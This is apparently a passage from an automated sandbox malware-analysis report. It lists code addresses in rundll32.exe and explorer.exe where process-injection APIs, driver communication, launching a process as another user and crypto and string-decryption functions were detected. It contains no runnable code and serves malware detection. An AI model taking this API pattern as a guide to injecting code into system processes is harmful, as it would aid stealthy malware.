Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFE2D2B6 NtAllocateVirtualMemory,	3_3_000001CEAFE2D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 3_3_000001CEAFE2D326 NtProtectVirtualMemory,	3_3_000001CEAFE2D326
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4BE0 NtProtectVirtualMemory,	3_2_000001CEAFCA4BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4FF0 NtQueueApcThread,	3_2_000001CEAFCA4FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC717B0 NtClose,NtClose,	3_2_000001CEAFC717B0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4360 NtCreateThreadEx,	3_2_000001CEAFCA4360
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA4740 NtFreeVirtualMemory,	3_2_000001CEAFCA4740
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA3F40 NtAllocateVirtualMemory,	3_2_000001CEAFCA3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC87A50 NtSetContextThread,	3_2_000001CEAFC87A50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC71600 NtClose,RtlExitUserThread,	3_2_000001CEAFC71600
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC88149 NtSetContextThread,	3_2_000001CEAFC88149
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00000276197BD326 NtProtectVirtualMemory,	4_3_00000276197BD326
Source: C:\Windows\System32\rundll32.exe	Code function: 4_3_00000276197BD2B6 NtAllocateVirtualMemory,	4_3_00000276197BD2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196271B0 NtClose,	4_2_00000276196271B0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619638149 NtSetContextThread,	4_2_0000027619638149
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654BE0 NtProtectVirtualMemory,	4_2_0000027619654BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654FF0 NtQueueApcThread,	4_2_0000027619654FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196217B0 NtClose,NtClose,	4_2_00000276196217B0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654360 NtCreateThreadEx,	4_2_0000027619654360
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619653F40 NtAllocateVirtualMemory,	4_2_0000027619653F40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619654740 NtFreeVirtualMemory,	4_2_0000027619654740
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619621600 NtClose,RtlExitUserThread,	4_2_0000027619621600
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619637A50 NtSetContextThread,	4_2_0000027619637A50
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC7D2B6 NtAllocateVirtualMemory,	6_3_000002339FC7D2B6
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000002339FC7D326 NtProtectVirtualMemory,	6_3_000002339FC7D326
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4360 NtCreateThreadEx,	6_2_000002339FBB4360
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB817B0 NtClose,NtClose,	6_2_000002339FB817B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB3F40 NtAllocateVirtualMemory,	6_2_000002339FBB3F40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4740 NtFreeVirtualMemory,	6_2_000002339FBB4740
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB81600 NtClose,RtlExitUserThread,	6_2_000002339FB81600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB97A50 NtSetContextThread,	6_2_000002339FB97A50
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB98149 NtSetContextThread,	6_2_000002339FB98149
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4FF0 NtQueueApcThread,	6_2_000002339FBB4FF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB4BE0 NtProtectVirtualMemory,	6_2_000002339FBB4BE0
Source: C:\Windows\explorer.exe	Code function: 8_2_0303C704 NtDelayExecution,	8_2_0303C704
Source: C:\Windows\explorer.exe	Code function: 8_2_0303B388 NtAllocateVirtualMemory,	8_2_0303B388
Source: C:\Windows\explorer.exe	Code function: 8_2_030382B4 NtFreeVirtualMemory,	8_2_030382B4
Source: C:\Windows\explorer.exe	Code function: 8_2_030401A0 NtFreeVirtualMemory,	8_2_030401A0
Source: C:\Windows\explorer.exe	Code function: 8_2_030381C8 NtWriteFile,	8_2_030381C8
Source: C:\Windows\explorer.exe	Code function: 8_2_03038240 NtClose,	8_2_03038240
Source: C:\Windows\explorer.exe	Code function: 8_2_030380B8 RtlInitUnicodeString,NtCreateFile,	8_2_030380B8
Source: C:\Windows\explorer.exe	Code function: 8_2_083882B4 NtFreeVirtualMemory,	8_2_083882B4
Source: C:\Windows\explorer.exe	Code function: 8_2_0838B388 NtAllocateVirtualMemory,	8_2_0838B388
Source: C:\Windows\explorer.exe	Code function: 8_2_08388240 NtClose,	8_2_08388240
Source: C:\Windows\explorer.exe	Code function: 8_2_083880B8 RtlInitUnicodeString,NtCreateFile,	8_2_083880B8
Source: C:\Windows\explorer.exe	Code function: 8_2_0838C704 NtDelayExecution,	8_2_0838C704
Source: C:\Windows\explorer.exe	Code function: 8_2_083901A0 NtFreeVirtualMemory,	8_2_083901A0
Source: C:\Windows\explorer.exe	Code function: 8_2_083881C8 NtWriteFile,	8_2_083881C8
Source: C:\Windows\explorer.exe	Code function: 8_2_088582B4 NtFreeVirtualMemory,	8_2_088582B4
Source: C:\Windows\explorer.exe	Code function: 8_2_0885B388 NtAllocateVirtualMemory,	8_2_0885B388
Source: C:\Windows\explorer.exe	Code function: 8_2_088580B8 RtlInitUnicodeString,NtCreateFile,	8_2_088580B8
Source: C:\Windows\explorer.exe	Code function: 8_2_08858240 NtClose,	8_2_08858240
Source: C:\Windows\explorer.exe	Code function: 8_2_088601A0 NtFreeVirtualMemory,	8_2_088601A0
Source: C:\Windows\explorer.exe	Code function: 8_2_088581C8 NtWriteFile,	8_2_088581C8
Source: C:\Windows\explorer.exe	Code function: 8_2_0885C704 NtDelayExecution,	8_2_0885C704
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45241C NtAllocateVirtualMemory,	8_2_0E45241C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45248C NtFreeVirtualMemory,	8_2_0E45248C

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8D56B7C: CreateFileW,DeviceIoControl,CloseHandle,

3_2_00007FF8A8D56B7C

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00007FF8A8CFDA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,

3_2_00007FF8A8CFDA48

Detected potential crypto function

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D069A0	3_2_00007FF8A8D069A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2E90C	3_2_00007FF8A8D2E90C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD9AF0	3_2_00007FF8A8DD9AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFFA78	3_2_00007FF8A8CFFA78
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DE4A20	3_2_00007FF8A8DE4A20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D0BA28	3_2_00007FF8A8D0BA28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D179F8	3_2_00007FF8A8D179F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCBB1C	3_2_00007FF8A8DCBB1C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFDCBC	3_2_00007FF8A8CFDCBC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFBCB8	3_2_00007FF8A8CFBCB8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D09C5C	3_2_00007FF8A8D09C5C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7AC00	3_2_00007FF8A8D7AC00
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFEDE0	3_2_00007FF8A8CFEDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D09D8C	3_2_00007FF8A8D09D8C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1BEDC	3_2_00007FF8A8D1BEDC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7CEB0	3_2_00007FF8A8D7CEB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D56E84	3_2_00007FF8A8D56E84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D41E90	3_2_00007FF8A8D41E90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72E90	3_2_00007FF8A8D72E90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D19E64	3_2_00007FF8A8D19E64
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFAF20	3_2_00007FF8A8CFAF20
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D070EC	3_2_00007FF8A8D070EC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D061E0	3_2_00007FF8A8D061E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD01A4	3_2_00007FF8A8DD01A4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2C180	3_2_00007FF8A8D2C180
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D250F8	3_2_00007FF8A8D250F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D322D4	3_2_00007FF8A8D322D4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D72200	3_2_00007FF8A8D72200
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D7C3D0	3_2_00007FF8A8D7C3D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1C3A8	3_2_00007FF8A8D1C3A8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D2530C	3_2_00007FF8A8D2530C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D05320	3_2_00007FF8A8D05320
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DB9470	3_2_00007FF8A8DB9470
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D0B560	3_2_00007FF8A8D0B560
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DD8554	3_2_00007FF8A8DD8554
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D1D698	3_2_00007FF8A8D1D698
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D746A0	3_2_00007FF8A8D746A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D07680	3_2_00007FF8A8D07680
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DCD670	3_2_00007FF8A8DCD670
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DDC638	3_2_00007FF8A8DDC638
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D4D604	3_2_00007FF8A8D4D604
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D737C0	3_2_00007FF8A8D737C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8D75780	3_2_00007FF8A8D75780
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFC878	3_2_00007FF8A8CFC878
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8CFA83C	3_2_00007FF8A8CFA83C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00007FF8A8DE5834	3_2_00007FF8A8DE5834
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8CBE0	3_2_000001CEAFC8CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC913A3	3_2_000001CEAFC913A3
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC92BB0	3_2_000001CEAFC92BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC9FBC0	3_2_000001CEAFC9FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA2F60	3_2_000001CEAFCA2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC7A730	3_2_000001CEAFC7A730
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA1F40	3_2_000001CEAFCA1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8BED0	3_2_000001CEAFC8BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC966E0	3_2_000001CEAFC966E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC816A0	3_2_000001CEAFC816A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC842A0	3_2_000001CEAFC842A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC982A0	3_2_000001CEAFC982A0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC766C0	3_2_000001CEAFC766C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA0210	3_2_000001CEAFCA0210
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC97220	3_2_000001CEAFC97220
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC799D0	3_2_000001CEAFC799D0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC9B5E0	3_2_000001CEAFC9B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC955E0	3_2_000001CEAFC955E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC84DB0	3_2_000001CEAFC84DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC855C0	3_2_000001CEAFC855C0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC94550	3_2_000001CEAFC94550
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC75D60	3_2_000001CEAFC75D60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC89120	3_2_000001CEAFC89120
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8B4E0	3_2_000001CEAFC8B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC79500	3_2_000001CEAFC79500
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFC8A100	3_2_000001CEAFC8A100
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA1490	3_2_000001CEAFCA1490
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001CEAFCA2812	3_2_000001CEAFCA2812
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619639120	4_2_0000027619639120
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619629500	4_2_0000027619629500
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963A100	4_2_000002761963A100
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963B4E0	4_2_000002761963B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619634DB0	4_2_0000027619634DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619625D60	4_2_0000027619625D60
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619644550	4_2_0000027619644550
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619652812	4_2_0000027619652812
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963CBE0	4_2_000002761963CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761964FBC0	4_2_000002761964FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619651490	4_2_0000027619651490
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761962A730	4_2_000002761962A730
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196466E0	4_2_00000276196466E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196266C0	4_2_00000276196266C0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761963BED0	4_2_000002761963BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196413A3	4_2_00000276196413A3
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619642BB0	4_2_0000027619642BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619652F60	4_2_0000027619652F60
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619651F40	4_2_0000027619651F40
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619647220	4_2_0000027619647220
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_0000027619650210	4_2_0000027619650210
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196455E0	4_2_00000276196455E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_000002761964B5E0	4_2_000002761964B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196355C0	4_2_00000276196355C0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196299D0	4_2_00000276196299D0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196316A0	4_2_00000276196316A0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196342A0	4_2_00000276196342A0
Source: C:\Windows\System32\rundll32.exe	Code function: 4_2_00000276196482A0	4_2_00000276196482A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB2F60	6_2_000002339FBB2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBAFBC0	6_2_000002339FBAFBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA2BB0	6_2_000002339FBA2BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA13A3	6_2_000002339FBA13A3
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA66E0	6_2_000002339FBA66E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB1F40	6_2_000002339FBB1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB8A730	6_2_000002339FB8A730
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9BED0	6_2_000002339FB9BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB866C0	6_2_000002339FB866C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB916A0	6_2_000002339FB916A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB942A0	6_2_000002339FB942A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA82A0	6_2_000002339FBA82A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB0210	6_2_000002339FBB0210
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBAB5E0	6_2_000002339FBAB5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA55E0	6_2_000002339FBA55E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA7220	6_2_000002339FBA7220
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB85D60	6_2_000002339FB85D60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB899D0	6_2_000002339FB899D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB955C0	6_2_000002339FB955C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB94DB0	6_2_000002339FB94DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9A100	6_2_000002339FB9A100
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB89500	6_2_000002339FB89500
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9B4E0	6_2_000002339FB9B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBA4550	6_2_000002339FBA4550
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB99120	6_2_000002339FB99120
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB1490	6_2_000002339FBB1490
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FBB2812	6_2_000002339FBB2812
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000002339FB9CBE0	6_2_000002339FB9CBE0
Source: C:\Windows\explorer.exe	Code function: 8_2_03032164	8_2_03032164
Source: C:\Windows\explorer.exe	Code function: 8_2_03031A7C	8_2_03031A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_03031A8C	8_2_03031A8C
Source: C:\Windows\explorer.exe	Code function: 8_2_08381A7C	8_2_08381A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_08381A8C	8_2_08381A8C
Source: C:\Windows\explorer.exe	Code function: 8_2_08382164	8_2_08382164
Source: C:\Windows\explorer.exe	Code function: 8_2_08851A8C	8_2_08851A8C
Source: C:\Windows\explorer.exe	Code function: 8_2_08851A7C	8_2_08851A7C
Source: C:\Windows\explorer.exe	Code function: 8_2_08852164	8_2_08852164
Source: C:\Windows\explorer.exe	Code function: 8_2_0E454B50	8_2_0E454B50
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E9708	8_2_0E4E9708
Source: C:\Windows\explorer.exe	Code function: 8_2_0E46FE38	8_2_0E46FE38
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B1ECC	8_2_0E4B1ECC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E0EC0	8_2_0E4E0EC0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A7EE8	8_2_0E4A7EE8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4EAE84	8_2_0E4EAE84
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45BEB8	8_2_0E45BEB8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E499F68	8_2_0E499F68
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4CAF20	8_2_0E4CAF20
Source: C:\Windows\explorer.exe	Code function: 8_2_0E457FD0	8_2_0E457FD0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E47FC72	8_2_0E47FC72
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B7C14	8_2_0E4B7C14
Source: C:\Windows\explorer.exe	Code function: 8_2_0E459CBC	8_2_0E459CBC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C5D68	8_2_0E4C5D68
Source: C:\Windows\explorer.exe	Code function: 8_2_0E480D18	8_2_0E480D18
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48EDE0	8_2_0E48EDE0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A8DF8	8_2_0E4A8DF8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E479D94	8_2_0E479D94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E9D94	8_2_0E4E9D94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E480A8A	8_2_0E480A8A
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49EA84	8_2_0E49EA84
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C0B54	8_2_0E4C0B54
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4D2B38	8_2_0E4D2B38
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DDB34	8_2_0E4DDB34
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49BB94	8_2_0E49BB94
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4EEBB8	8_2_0E4EEBB8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B7874	8_2_0E4B7874
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A481C	8_2_0E4A481C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E488824	8_2_0E488824
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48D834	8_2_0E48D834
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DD8B8	8_2_0E4DD8B8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C98B0	8_2_0E4C98B0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4E4940	8_2_0E4E4940
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45D9E4	8_2_0E45D9E4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C8980	8_2_0E4C8980
Source: C:\Windows\explorer.exe	Code function: 8_2_0E479650	8_2_0E479650
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DD63C	8_2_0E4DD63C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E475768	8_2_0E475768
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C672C	8_2_0E4C672C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4677E0	8_2_0E4677E0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B8788	8_2_0E4B8788
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A7448	8_2_0E4A7448
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4AE45C	8_2_0E4AE45C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C2430	8_2_0E4C2430
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49F4C4	8_2_0E49F4C4
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B84D8	8_2_0E4B84D8
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4D94F0	8_2_0E4D94F0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B3498	8_2_0E4B3498
Source: C:\Windows\explorer.exe	Code function: 8_2_0E470540	8_2_0E470540
Source: C:\Windows\explorer.exe	Code function: 8_2_0E458568	8_2_0E458568
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B4564	8_2_0E4B4564
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C5534	8_2_0E4C5534
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45453C	8_2_0E45453C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E49B5D0	8_2_0E49B5D0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B05FC	8_2_0E4B05FC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E47F5FB	8_2_0E47F5FB
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4805A0	8_2_0E4805A0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456358	8_2_0E456358
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4DB370	8_2_0E4DB370
Source: C:\Windows\explorer.exe	Code function: 8_2_0E45E31C	8_2_0E45E31C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4983EC	8_2_0E4983EC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C73A0	8_2_0E4C73A0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4BA048	8_2_0E4BA048
Source: C:\Windows\explorer.exe	Code function: 8_2_0E48E074	8_2_0E48E074
Source: C:\Windows\explorer.exe	Code function: 8_2_0E456078	8_2_0E456078
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4AF018	8_2_0E4AF018
Source: C:\Windows\explorer.exe	Code function: 8_2_0E476038	8_2_0E476038
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4970C0	8_2_0E4970C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C0154	8_2_0E4C0154
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B0114	8_2_0E4B0114
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4C4134	8_2_0E4C4134
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4B11CC	8_2_0E4B11CC
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4851C0	8_2_0E4851C0
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4801FB	8_2_0E4801FB
Source: C:\Windows\explorer.exe	Code function: 8_2_0E4A318C	8_2_0E4A318C
Source: C:\Windows\explorer.exe	Code function: 8_2_0E46D19C	8_2_0E46D19C

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8DC9868 appears 296 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0F210 appears 62 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8DC9670 appears 61 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0C6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FF8A8D0ECA0 appears 394 times
